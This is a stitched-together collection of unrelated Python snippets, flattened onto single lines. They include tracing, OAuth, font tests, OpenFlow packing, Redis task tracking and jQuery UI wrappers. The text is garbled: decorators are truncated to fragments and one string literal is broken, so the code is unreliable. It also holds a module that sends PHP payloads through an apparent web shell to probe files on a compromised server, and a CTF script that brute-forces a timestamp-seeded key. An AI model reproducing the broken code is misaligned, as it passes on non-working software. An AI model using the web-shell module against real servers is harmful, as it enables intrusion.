transaction_type, trace_parent=trace_parent, is_sampled=is_sampled, start=start, sample_rate=sample_rate, links=links) if (trace_parent is None): transaction.trace_parent.add_tracestate(constants.TRACESTATE.SAMPLE_RATE, sample_rate) if auto_activate: execution_context.set_transaction(transaction) return transaction def end_transaction(self, result=None, transaction_name=None, duration=None): transaction = execution_context.get_transaction(clear=True) if transaction: if (transaction.name is None): transaction.name = (str(transaction_name) if (transaction_name is not None) else '') transaction.end(duration=duration) if self._should_ignore(transaction.name): return if ((not transaction.is_sampled) and self._agent.check_server_version(gte=(8, 0))): return if (transaction.result is None): transaction.result = result self.queue_func(TRANSACTION, transaction.to_dict()) return transaction def _should_ignore(self, transaction_name): for pattern in self._ignore_patterns: if pattern.search(transaction_name): return True return False
def _access(line: Union[(PitchLine, DurationLine)], position: Union[(int, Tuple[(int, int)])]) -> Union[(Pitch, None, List[Pitch], Duration)]: if isinstance(position, int): item = line[position] else: (i, j) = position item = line[i] if isinstance(item, list): item = item[j] return item
class OAuth2Token(Dict[(str, Any)]): def __init__(self, token_dict: Dict[(str, Any)]): if ('expires_at' in token_dict): token_dict['expires_at'] = int(token_dict['expires_at']) elif ('expires_in' in token_dict): token_dict['expires_at'] = (int(time.time()) + int(token_dict['expires_in'])) super().__init__(token_dict) def is_expired(self): if ('expires_at' not in self): return False return (time.time() > self['expires_at'])
.parametrize('degree, mesh', [(d, m) for d in range(1, 8) for m in (UnitIntervalMesh(2), UnitSquareMesh(2, 2))]) def test_integrate_result_type(degree, mesh): fe = LagrangeElement(mesh.cell, degree) fs = FunctionSpace(mesh, fe) f = Function(fs) i = f.integrate() assert isinstance(i, float), ('Integrate must return a float, not a %s' % str(type(i)))
def terminal_get_size(default_size=(25, 80)): def ioctl_gwinsz(fd): try: return struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234')) except Exception: return None size = (ioctl_gwinsz(0) or ioctl_gwinsz(1) or ioctl_gwinsz(2)) if (not size): try: fd = os.open(os.ctermid(), os.O_RDONLY) size = ioctl_gwinsz(fd) os.close(fd) except Exception: pass if (not size): try: size = (os.environ['LINES'], os.environ['COLUMNS']) except Exception: return default_size return map(int, size)
class FIFODUT(Module): def __init__(self, base, depth, data_width=8, address_width=32, with_bypass=False): port_data_width = (data_width if (not with_bypass) else (4 * data_width)) self.write_port = LiteDRAMNativeWritePort(address_width=32, data_width=port_data_width) self.read_port = LiteDRAMNativeReadPort(address_width=32, data_width=port_data_width) self.submodules.fifo = LiteDRAMFIFO(data_width=data_width, base=base, depth=depth, write_port=self.write_port, read_port=self.read_port, with_bypass=with_bypass) margin = 8 self.memory = DRAMMemory(port_data_width, ((base + depth) + margin)) def write(self, data): (yield self.fifo.sink.valid.eq(1)) (yield self.fifo.sink.data.eq(data)) (yield) while (not (yield self.fifo.sink.ready)): (yield) (yield self.fifo.sink.valid.eq(0)) def read(self): while (not (yield self.fifo.source.valid)): (yield) (yield self.fifo.source.ready.eq(1)) data = (yield self.fifo.source.data) (yield) (yield self.fifo.source.ready.eq(0)) (yield) return data
def load_localized_config(name, repodir): ret = dict() found_config_file = False for f in Path().glob('config/**/{name}.yml'.format(name=name)): found_config_file = True locale = f.parts[1] if (len(f.parts) == 2): locale = DEFAULT_LOCALE with open(f, encoding='utf-8') as fp: elem = yaml.safe_load(fp) if (not isinstance(elem, dict)): msg = _('{path} is not "key: value" dict, but a {datatype}!') raise TypeError(msg.format(path=f, datatype=type(elem).__name__)) for (afname, field_dict) in elem.items(): if (afname not in ret): ret[afname] = dict() for (key, value) in field_dict.items(): if (key not in ret[afname]): ret[afname][key] = dict() if (key == 'icon'): icons_dir = os.path.join(repodir, 'icons') if (not os.path.exists(icons_dir)): os.makedirs(icons_dir, exist_ok=True) shutil.copy(os.path.join('config', value), icons_dir) ret[afname][key][locale] = file_entry(os.path.join(icons_dir, value)) else: ret[afname][key][locale] = value if (not found_config_file): for f in Path().glob('config/*.yml'): if (f.stem not in CONFIG_NAMES): msg = _('{path} is not a standard config file!').format(path=f) m = difflib.get_close_matches(f.stem, CONFIG_NAMES, 1) if m: msg += ' ' msg += _('Did you mean config/{name}.yml?').format(name=m[0]) logging.error(msg) for elem in ret.values(): for afname in elem: elem[afname] = {locale: v for (locale, v) in sorted(elem[afname].items())} return ret
def test_dispersion_load_file(): fitter = DispersionFitter.from_file('tests/data/nk_data.csv', skiprows=1, delimiter=',') (medium, rms) = fitter.fit(num_tries=2) fitter = DispersionFitter.from_file('tests/data/n_data.csv', skiprows=1, delimiter=',') (medium, rms) = fitter.fit(num_tries=20) fitter = FastDispersionFitter.from_file('tests/data/nk_data.csv', skiprows=1, delimiter=',') (medium, rms) = fitter.fit(advanced_param=advanced_param)
.django_db(transaction=True) def test_download_transactions_new_awards_only(client, monkeypatch, download_test_data, elasticsearch_transaction_index): setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index) download_generation.retrieve_db_string = Mock(return_value=get_database_dsn_string(settings.DOWNLOAD_DB_ALIAS)) resp = client.post('/api/v2/download/transactions/', content_type='application/json', data=json.dumps({'filters': {'time_period': [{'date_type': 'new_awards_only', 'start_date': '2017-12-31', 'end_date': '2018-01-02'}]}})) assert (resp.status_code == status.HTTP_200_OK) assert ('.zip' in resp.json()['file_url'])
def extractSultricWordpressCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('Sy', 'seducing you', 'translated'), ('seducing you', 'seducing you', 'translated'), ('bpetit', "being papa'd every time i transmigrate", 'translated'), ("being papa'd every time i transmigrate", "being papa'd every time i transmigrate", 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
def get_spark_session() -> 'pyspark.sql.SparkSession': spark_session = pyspark.sql.SparkSession.builder.master('local[*]').appName('foundry-dev-tools').getOrCreate() spark_session.conf.set('spark.sql.execution.arrow.pyspark.enabled', 'true') spark_session.conf.set('spark.sql.execution.arrow.pyspark.fallback.enabled', 'true') return spark_session
class TestWorksheetInsertColumn(unittest.TestCase): def setUp(self): self.wb = Workbook() def test_insert_first_column_into_empty_sheet(self): ws = self.wb.addSheet('test sheet') self.assertEqual(len(ws.data), 0) self.assertEqual(ws.ncols, 0) column = ['1', '2', '3'] ws.insertColumn(0, insert_items=column) self.assertEqual(len(ws.data), 3) self.assertEqual(ws.ncols, 1) for i in range(len(column)): self.assertEqual(str(column[i]), ws.data[i]) def test_insert_second_column_into_empty_sheet(self): ws = self.wb.addSheet('test sheet') self.assertEqual(len(ws.data), 0) self.assertEqual(ws.ncols, 0) column = ['1', '2', '3'] ws.insertColumn(1, insert_items=column) self.assertEqual(len(ws.data), 3) self.assertEqual(ws.ncols, 2) for i in range(len(column)): self.assertEqual(('\t' + str(column[i])), ws.data[i]) def test_insert_column_into_sheet_with_data(self): ws = self.wb.addSheet('test sheet') data = ['1\t2\t3', '4\t5\t6'] ws.addTabData(data) self.assertEqual(len(ws.data), 2) self.assertEqual(ws.ncols, 3) column = ['1', '2', '3'] ws.insertColumn(1, insert_items=column) self.assertEqual(len(ws.data), 3) self.assertEqual(ws.ncols, 4) new_data = ['1\t1\t2\t3', '4\t2\t5\t6', '\t3'] for i in range(len(new_data)): self.assertEqual(new_data[i], ws.data[i]) def test_insert_column_into_sheet_with_data_single_value(self): ws = self.wb.addSheet('test sheet') data = ['1\t2\t3', '4\t5\t6'] ws.addTabData(data) self.assertEqual(len(ws.data), 2) self.assertEqual(ws.ncols, 3) value = '7' ws.insertColumn(1, insert_items=value) self.assertEqual(len(ws.data), 2) self.assertEqual(ws.ncols, 4) new_data = ['1\t7\t2\t3', '4\t7\t5\t6'] for i in range(len(new_data)): self.assertEqual(new_data[i], ws.data[i]) def test_insert_titled_column_into_empty_sheet(self): ws = self.wb.addSheet('test sheet') self.assertEqual(len(ws.data), 0) self.assertEqual(ws.ncols, 0) title = 'hello' column = ['1', '2'] ws.insertColumn(1, title=title, insert_items=column) self.assertEqual(len(ws.data), 3) self.assertEqual(ws.ncols, 2) new_data = ['\thello', '\t1', '\t2'] for i in range(len(new_data)): self.assertEqual(new_data[i], ws.data[i]) def test_insert_titled_column_into_sheet_with_data(self): ws = self.wb.addSheet('test sheet') data = ['1\t2\t3', '4\t5\t6', '7\t8\t9'] ws.addTabData(data) self.assertEqual(len(ws.data), 3) self.assertEqual(ws.ncols, 3) title = 'hello' column = ['1', '2'] ws.insertColumn(1, title=title, insert_items=column) self.assertEqual(len(ws.data), 3) self.assertEqual(ws.ncols, 4) new_data = ['1\thello\t2\t3', '4\t1\t5\t6', '7\t2\t8\t9'] for i in range(len(new_data)): self.assertEqual(new_data[i], ws.data[i]) def test_insert_long_titled_column_into_sheet_with_data(self): ws = self.wb.addSheet('test sheet') data = ['1\t2\t3', '4\t5\t6'] ws.addTabData(data) self.assertEqual(len(ws.data), 2) self.assertEqual(ws.ncols, 3) title = 'hello' column = ['1', '2'] ws.insertColumn(1, title=title, insert_items=column) self.assertEqual(len(ws.data), 3) self.assertEqual(ws.ncols, 4) new_data = ['1\thello\t2\t3', '4\t1\t5\t6', '\t2'] for i in range(len(new_data)): self.assertEqual(new_data[i], ws.data[i])
def reload_objects() -> None: alembic_config = get_alembic_config(DATABASE_URL) print(f'> Rolling back one migration to: {DOWN_REVISION}') command.downgrade(alembic_config, DOWN_REVISION) print("> Seeding the database with 'outdated' Taxonomy objects") create_outdated_objects() print('Upgrading database to migration revision: head') command.upgrade(alembic_config, 'head')
class CaretProcessor(util.PatternSequenceProcessor): PATTERNS = [util.PatSeqItem(re.compile(INS_SUP, (re.DOTALL | re.UNICODE)), 'double', 'ins,sup'), util.PatSeqItem(re.compile(SUP_INS, (re.DOTALL | re.UNICODE)), 'double', 'sup,ins'), util.PatSeqItem(re.compile(INS_SUP2, (re.DOTALL | re.UNICODE)), 'double', 'ins,sup'), util.PatSeqItem(re.compile(INS_SUP3, (re.DOTALL | re.UNICODE)), 'double2', 'ins,sup'), util.PatSeqItem(re.compile(INS, (re.DOTALL | re.UNICODE)), 'single', 'ins'), util.PatSeqItem(re.compile(SUP2, (re.DOTALL | re.UNICODE)), 'single', 'sup', True), util.PatSeqItem(re.compile(SUP, (re.DOTALL | re.UNICODE)), 'single', 'sup')]
def fetch_production(zone_key: ZoneKey, session: Session=Session(), target_datetime: (datetime | None)=None, logger: Logger=getLogger(__name__)): if target_datetime: raise NotImplementedError('This parser is not yet able to parse past dates.') query_data = query(session, logger, zone_key) query_data['leftoverMW'] = round((((query_data['consumptionMW'] - query_data['importMW']) - query_data['solarMW']) - query_data['windMW']), 13) prod_mix = ProductionMix() prod_mix.add_value('solar', query_data['solarMW']) prod_mix.add_value('wind', query_data['windMW']) prod_mix.add_value('unknown', query_data['leftoverMW']) prod_breakdown_list = ProductionBreakdownList(logger) prod_breakdown_list.append(datetime=query_data['time'], zoneKey=zone_key, source=' production=prod_mix) return prod_breakdown_list.to_list()
def insert_album(disc, year, artist): conn = engine.connect() disc_ins = discs.insert() new_disc = disc_ins.values(artista_id=id_artist(artist), album=disc, ano=year) try: conn.execute(new_disc) status = True except Exception as e: print(e) status = False finally: conn.close() return status
((scipy or munkres), 'scipy or munkres not installed') class InterpolatableTest(unittest.TestCase): def __init__(self, methodName): unittest.TestCase.__init__(self, methodName) if (not hasattr(self, 'assertRaisesRegex')): self.assertRaisesRegex = self.assertRaisesRegexp def setUp(self): self.tempdir = None self.num_tempfiles = 0 def tearDown(self): if self.tempdir: shutil.rmtree(self.tempdir) def get_test_input(*test_file_or_folder): (path, _) = os.path.split(__file__) return os.path.join(path, 'data', *test_file_or_folder) def get_file_list(folder, suffix, prefix=''): all_files = os.listdir(folder) file_list = [] for p in all_files: if (p.startswith(prefix) and p.endswith(suffix)): file_list.append(os.path.abspath(os.path.join(folder, p))) return sorted(file_list) def temp_path(self, suffix): self.temp_dir() self.num_tempfiles += 1 return os.path.join(self.tempdir, ('tmp%d%s' % (self.num_tempfiles, suffix))) def temp_dir(self): if (not self.tempdir): self.tempdir = tempfile.mkdtemp() def compile_font(self, path, suffix, temp_dir): ttx_filename = os.path.basename(path) savepath = os.path.join(temp_dir, ttx_filename.replace('.ttx', suffix)) font = TTFont(recalcBBoxes=False, recalcTimestamp=False) font.importXML(path) font.save(savepath, reorderTables=None) return (font, savepath) def test_interpolatable_ttf(self): suffix = '.ttf' ttx_dir = self.get_test_input('master_ttx_interpolatable_ttf') self.temp_dir() ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'TestFamily2-') for path in ttx_paths: self.compile_font(path, suffix, self.tempdir) ttf_paths = self.get_file_list(self.tempdir, suffix) self.assertIsNone(interpolatable_main(ttf_paths)) def test_interpolatable_otf(self): suffix = '.otf' ttx_dir = self.get_test_input('master_ttx_interpolatable_otf') self.temp_dir() ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'TestFamily2-') for path in ttx_paths: self.compile_font(path, suffix, self.tempdir) otf_paths = self.get_file_list(self.tempdir, suffix) self.assertIsNone(interpolatable_main(otf_paths)) def test_interpolatable_ufo(self): ttx_dir = self.get_test_input('master_ufo') ufo_paths = self.get_file_list(ttx_dir, '.ufo', 'TestFamily2-') self.assertIsNone(interpolatable_main(ufo_paths)) def test_designspace(self): designspace_path = self.get_test_input('InterpolateLayout.designspace') self.assertIsNone(interpolatable_main([designspace_path])) def test_glyphsapp(self): pytest.importorskip('glyphsLib') glyphsapp_path = self.get_test_input('InterpolateLayout.glyphs') self.assertIsNone(interpolatable_main([glyphsapp_path])) def test_VF(self): suffix = '.ttf' ttx_dir = self.get_test_input('master_ttx_varfont_ttf') self.temp_dir() ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'SparseMasters-') for path in ttx_paths: self.compile_font(path, suffix, self.tempdir) ttf_paths = self.get_file_list(self.tempdir, suffix) problems = interpolatable_main((['--quiet'] + ttf_paths)) self.assertIsNone(problems) def test_sparse_interpolatable_ttfs(self): suffix = '.ttf' ttx_dir = self.get_test_input('master_ttx_interpolatable_ttf') self.temp_dir() ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'SparseMasters-') for path in ttx_paths: self.compile_font(path, suffix, self.tempdir) ttf_paths = self.get_file_list(self.tempdir, suffix) problems = interpolatable_main((['--quiet'] + ttf_paths)) self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertIsNone(interpolatable_main((['--ignore-missing'] + ttf_paths))) self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ttf_paths[1]]) + [ttf_paths[0]]) + [ttf_paths[2]]))) self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ttf_paths[0]]) + [ttf_paths[2]]) + [ttf_paths[1]]))) def test_sparse_interpolatable_ufos(self): ttx_dir = self.get_test_input('master_ufo') ufo_paths = self.get_file_list(ttx_dir, '.ufo', 'SparseMasters-') problems = interpolatable_main((['--quiet'] + ufo_paths)) self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertIsNone(interpolatable_main((['--ignore-missing'] + ufo_paths))) self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ufo_paths[1]]) + [ufo_paths[0]]) + [ufo_paths[2]]))) self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ufo_paths[0]]) + [ufo_paths[2]]) + [ufo_paths[1]]))) def test_sparse_designspace(self): designspace_path = self.get_test_input('SparseMasters_ufo.designspace') problems = interpolatable_main(['--quiet', designspace_path]) self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}]) self.assertIsNone(interpolatable_main(['--ignore-missing', designspace_path])) def test_sparse_glyphsapp(self): pytest.importorskip('glyphsLib') glyphsapp_path = self.get_test_input('SparseMasters.glyphs') problems = interpolatable_main(['--quiet', glyphsapp_path]) self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}]) self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}]) self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}]) self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}]) self.assertIsNone(interpolatable_main(['--ignore-missing', glyphsapp_path])) def test_interpolatable_varComposite(self): input_path = self.get_test_input('..', '..', 'ttLib', 'data', 'varc-ac00-ac01.ttf') interpolatable_main((input_path,))
class flow_stats_entry(loxi.OFObject): def __init__(self, table_id=None, duration_sec=None, duration_nsec=None, priority=None, idle_timeout=None, hard_timeout=None, flags=None, cookie=None, packet_count=None, byte_count=None, match=None, instructions=None): if (table_id != None): self.table_id = table_id else: self.table_id = 0 if (duration_sec != None): self.duration_sec = duration_sec else: self.duration_sec = 0 if (duration_nsec != None): self.duration_nsec = duration_nsec else: self.duration_nsec = 0 if (priority != None): self.priority = priority else: self.priority = 0 if (idle_timeout != None): self.idle_timeout = idle_timeout else: self.idle_timeout = 0 if (hard_timeout != None): self.hard_timeout = hard_timeout else: self.hard_timeout = 0 if (flags != None): self.flags = flags else: self.flags = 0 if (cookie != None): self.cookie = cookie else: self.cookie = 0 if (packet_count != None): self.packet_count = packet_count else: self.packet_count = 0 if (byte_count != None): self.byte_count = byte_count else: self.byte_count = 0 if (match != None): self.match = match else: self.match = ofp.match() if (instructions != None): self.instructions = instructions else: self.instructions = [] return def pack(self): packed = [] packed.append(struct.pack('!H', 0)) packed.append(struct.pack('!B', self.table_id)) packed.append(('\x00' * 1)) packed.append(struct.pack('!L', self.duration_sec)) packed.append(struct.pack('!L', self.duration_nsec)) packed.append(struct.pack('!H', self.priority)) packed.append(struct.pack('!H', self.idle_timeout)) packed.append(struct.pack('!H', self.hard_timeout)) packed.append(struct.pack('!H', self.flags)) packed.append(('\x00' * 4)) packed.append(struct.pack('!Q', self.cookie)) packed.append(struct.pack('!Q', self.packet_count)) packed.append(struct.pack('!Q', self.byte_count)) packed.append(self.match.pack()) packed.append(loxi.generic_util.pack_list(self.instructions)) length = sum([len(x) for x in packed]) packed[0] = struct.pack('!H', length) return ''.join(packed) def unpack(reader): obj = flow_stats_entry() _length = reader.read('!H')[0] orig_reader = reader reader = orig_reader.slice(_length, 2) obj.table_id = reader.read('!B')[0] reader.skip(1) obj.duration_sec = reader.read('!L')[0] obj.duration_nsec = reader.read('!L')[0] obj.priority = reader.read('!H')[0] obj.idle_timeout = reader.read('!H')[0] obj.hard_timeout = reader.read('!H')[0] obj.flags = reader.read('!H')[0] reader.skip(4) obj.cookie = reader.read('!Q')[0] obj.packet_count = reader.read('!Q')[0] obj.byte_count = reader.read('!Q')[0] obj.match = ofp.match.unpack(reader) obj.instructions = loxi.generic_util.unpack_list(reader, ofp.instruction.instruction.unpack) return obj def __eq__(self, other): if (type(self) != type(other)): return False if (self.table_id != other.table_id): return False if (self.duration_sec != other.duration_sec): return False if (self.duration_nsec != other.duration_nsec): return False if (self.priority != other.priority): return False if (self.idle_timeout != other.idle_timeout): return False if (self.hard_timeout != other.hard_timeout): return False if (self.flags != other.flags): return False if (self.cookie != other.cookie): return False if (self.packet_count != other.packet_count): return False if (self.byte_count != other.byte_count): return False if (self.match != other.match): return False if (self.instructions != other.instructions): return False return True def pretty_print(self, q): q.text('flow_stats_entry {') with q.group(): with q.indent(2): q.breakable() q.text('table_id = ') q.text(('%#x' % self.table_id)) q.text(',') q.breakable() q.text('duration_sec = ') q.text(('%#x' % self.duration_sec)) q.text(',') q.breakable() q.text('duration_nsec = ') q.text(('%#x' % self.duration_nsec)) q.text(',') q.breakable() q.text('priority = ') q.text(('%#x' % self.priority)) q.text(',') q.breakable() q.text('idle_timeout = ') q.text(('%#x' % self.idle_timeout)) q.text(',') q.breakable() q.text('hard_timeout = ') q.text(('%#x' % self.hard_timeout)) q.text(',') q.breakable() q.text('flags = ') value_name_map = {1: 'OFPFF_SEND_FLOW_REM', 2: 'OFPFF_CHECK_OVERLAP', 4: 'OFPFF_RESET_COUNTS', 8: 'OFPFF_NO_PKT_COUNTS', 16: 'OFPFF_NO_BYT_COUNTS', 128: 'OFPFF_BSN_SEND_IDLE'} q.text(util.pretty_flags(self.flags, value_name_map.values())) q.text(',') q.breakable() q.text('cookie = ') q.text(('%#x' % self.cookie)) q.text(',') q.breakable() q.text('packet_count = ') q.text(('%#x' % self.packet_count)) q.text(',') q.breakable() q.text('byte_count = ') q.text(('%#x' % self.byte_count)) q.text(',') q.breakable() q.text('match = ') q.pp(self.match) q.text(',') q.breakable() q.text('instructions = ') q.pp(self.instructions) q.breakable() q.text('}')
def main(): global TARGET_FIRST_LINE, SECONDS_TO_BRUTEFORCE parser = argparse.ArgumentParser(description='Decrypt encrypted flag file') parser.add_argument('flag_file', help='Encrypted flag file to encrypt') args = parser.parse_args() lastmodified_timestamp = int(os.path.getmtime(args.flag_file)) print('Flag was last modified at:', lastmodified_timestamp) with open(args.flag_file, 'rb') as f: encrypted_data = f.read() lastmodified_timestamp -= SECONDS_TO_BRUTEFORCE decrypt_successful = False for _ in range((2 + SECONDS_TO_BRUTEFORCE)): print('Bruteforcing w/ value:', lastmodified_timestamp) decrypted_data = decrypt_flag(encrypted_data, lastmodified_timestamp) try: if decrypted_data.decode('ascii').startswith(TARGET_FIRST_LINE): decrypt_successful = True break except UnicodeDecodeError: pass lastmodified_timestamp += 1 if decrypt_successful: print('Decrypted File:') print(decrypted_data.decode('ascii')) else: print('WTF - Could not decrypt file')
class BaseImageInspectorTool(EnableTestAssistant, UnittestTools): def setUp(self): self.plot.bounds = [100, 100] self.plot._window = self.create_mock_window() renderer = self.plot.plots['plot0'][0] self.tool = ImageInspectorTool(component=renderer) self.overlay = ImageInspectorOverlay(component=renderer, image_inspector=self.tool) self.overlay2 = CustomImageInspectorOverlay(component=renderer, image_inspector=self.tool) self.plot.active_tool = self.tool self.plot.do_layout() self.insp_event = None def test_mouse_move_records_last_position(self): tool = self.tool self.assertEqual(tool.last_mouse_position, ()) self.mouse_move(tool, 0, 0) self.assertEqual(tool.last_mouse_position, (0, 0)) self.mouse_move(tool, 10, 10) self.assertEqual(tool.last_mouse_position, (10, 10)) self.mouse_leave(tool, 1000, 1000) self.assertEqual(tool.last_mouse_position, (10, 10)) def test_mouse_move_custom_overlay(self): tool = self.tool tool.observe(self.store_inspector_event, 'new_value') try: self.assertIsNone(self.insp_event) with self.assertTraitChanges(tool, 'new_value', 1): with self.assertTraitChanges(self.overlay2, 'text', 1): self.mouse_move(tool, 0, 0) self.assertEqual(self.overlay2.text, 'Position: (0, 0)') finally: tool.observe(self.store_inspector_event, 'new_value', remove=True) def store_inspector_event(self, event): self.insp_event = event.new
class UserTasks(object): redis = cq.backend.client key_all = (KEY_PREFIX + 'tasks') __slots__ = ('user_id', 'key', 'data') def __init__(self, user_id): self.user_id = user_id self.key = ((KEY_PREFIX + 'tasks-') + str(user_id)) self.data = {} def __repr__(self): return ('<User: %s, Tasks: %s>' % (self.user_id, self.data.keys())) def exists(cls, task_id): return cls.redis.sismember(cls.key_all, task_id) def check(cls, task_id, timeout=CHECK_TIMEOUT, logger=logger): wait = 0.5 while True: if cls.exists(task_id): logger.info('Task "%s" was found in UserTasks', task_id) break if (wait > timeout): logger.error('Ou ou. Task "%s" was not registered in UserTasks. Failing after waiting for %s seconds.', task_id, wait) raise UserTaskError(('Task "%s" was not registered in user\'s task list' % task_id)) if (wait > 1): logger.warn('Whoa! Task "%s" not found in UserTasks. Waiting for %s seconds', task_id, wait) else: logger.info('Whoa! Task "%s" not found in UserTasks. Waiting for %s seconds', task_id, wait) sleep(wait) wait *= 2 def tasks(self): return self.load() def tasklist(self): return self.redis.hkeys(self.key) def tasklist_all(self): return self.redis.smembers(self.key_all) def load(self): self.data.clear() for (task_id, task_info) in iteritems(self.redis.hgetall(self.key)): self.data[task_id] = pickle.loads(task_info) return self.data def get(self, task_id): task_info = self.redis.hget(self.key, task_id) if (task_info is not None): return pickle.loads(task_info) return None def add(self, task_id, task_info): ar = cq.AsyncResult(task_id) if ar.ready(): raise UserTaskError(('Task "%s" cannot be registered in user\'s task list because it has already finished' % task_id)) pipe = self.redis.pipeline() pipe.hset(self.key, task_id, pickle.dumps(task_info)) pipe.sadd(self.key_all, task_id) res = bool(pipe.execute()[0]) if res: logger.info('Task %s added into %s', task_id, self.key) else: logger.warn('Task %s was updated in %s', task_id, self.key) return res def delete(self, task_id): pipe = self.redis.pipeline() pipe.hdel(self.key, task_id) pipe.srem(self.key_all, task_id) res = bool(pipe.execute()[0]) if res: logger.info('Task %s removed from %s', task_id, self.key) else: logger.warn('Task %s was not removed from %s', task_id, self.key) return res def pop(self, task_id): task_info = self.get(task_id) if (task_info is None): return {} self.delete(task_id) return task_info
class Check(Module): def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) payload_perms = ("$f='${rpath}';if(_exists($f)){print('e');if(_readable($f))print('r');" + "if(_writable($f))print('w');if(_executable($f))print('x');}") self.register_vectors([PhpCode(payload_perms, 'exists', postprocess=(lambda x: (True if ('e' in x) else False))), PhpCode("print(md5_file('${rpath}'));", 'md5'), PhpCode(payload_perms, 'perms'), PhpCode(payload_perms, 'readable', postprocess=(lambda x: (True if ('r' in x) else False))), PhpCode(payload_perms, 'writable', postprocess=(lambda x: (True if ('w' in x) else False))), PhpCode(payload_perms, 'executable', postprocess=(lambda x: (True if ('x' in x) else False))), PhpCode("print(is_file('${rpath}') ? 1 : 0);", 'file', postprocess=(lambda x: (True if (x == '1') else False))), PhpCode("print(is_dir('${rpath}') ? 1 : 0);", 'dir', postprocess=(lambda x: (True if (x == '1') else False))), PhpCode("print(filesize('${rpath}'));", 'size', postprocess=(lambda x: utils.prettify.format_size(int(x)))), PhpCode("print(filemtime('${rpath}'));", 'time', postprocess=(lambda x: int(x))), PhpCode("print(filemtime('${rpath}'));", 'datetime', postprocess=(lambda x: datetime.datetime.fromtimestamp(float(x)).strftime('%Y-%m-%d %H:%M:%S'))), PhpCode("print(realpath('${rpath}'));", 'abspath')]) self.register_arguments([{'name': 'rpath', 'help': 'Target path'}, {'name': 'check', 'choices': self.vectors.get_names()}]) def run(self, **kwargs): return self.vectors.get_result(name=self.args['check'], format_args=self.args)
class Menu(JQueryUI): def blur(self): return JsObjects.JsObjects.get(('%s.menu("blur")' % self.component.dom.jquery.varId)) def collapse(self): return JsObjects.JsObjects.get(('%s.menu("collapse")' % self.component.dom.jquery.varId)) def collapseAll(self): return JsObjects.JsObjects.get(('%s.menu("collapseAll", null, true)' % self.component.dom.jquery.varId)) def destroy(self): return JsObjects.JsObjects.get(('%s.menu("destroy")' % self.component.dom.jquery.varId)) def disable(self): return JsObjects.JsObjects.get(('%s.menu("disable")' % self.component.dom.jquery.varId)) def enable(self): return JsObjects.JsObjects.get(('%s.menu("enable")' % self.component.dom.jquery.varId)) def expand(self): return JsObjects.JsObjects.get(('%s.menu("expand")' % self.component.dom.jquery.varId)) def instance(self): return JsObjects.JsObjects.get(('%s.menu("instance")' % self.component.dom.jquery.varId)) def isFirstItem(self): return JsObjects.JsBoolean.JsBoolean(('%s.menu("isFirstItem")' % self.component.dom.jquery.varId)) def isLastItem(self): return JsObjects.JsBoolean.JsBoolean(('%s.menu("isLastItem")' % self.component.dom.jquery.varId)) def next(self): return JsObjects.JsObjects.get(('%s.menu("next")' % self.component.dom.jquery.varId)) def nextPage(self): return JsObjects.JsObjects.get(('%s.menu("nextPage")' % self.component.dom.jquery.varId)) def option(self, data=None, value=None): if (data is None): return JsObjects.JsObjects.get(('%s.menu("option")' % self.component.dom.jquery.varId)) data = JsUtils.jsConvertData(data, None) if (value is None): return JsObjects.JsObjects.get(('%s.menu("option", %s)' % (self.component.dom.jquery.varId, data))) value = JsUtils.jsConvertData(value, None) return JsObjects.JsObjects.get(('%s.menu("option", %s, %s)' % (self.component.dom.jquery.varId, data, value))) def previous(self): return JsObjects.JsObjects.get(('%s.menu("previous")' % self.component.dom.jquery.varId)) def previousPage(self): return JsObjects.JsObjects.get(('%s.menu("previousPage")' % self.component.dom.jquery.varId)) def refresh(self): return JsObjects.JsObjects.get(('%s.menu("refresh")' % self.component.dom.jquery.varId)) def select(self): return JsObjects.JsObjects.get(('%s.menu("select")' % self.component.dom.jquery.varId))
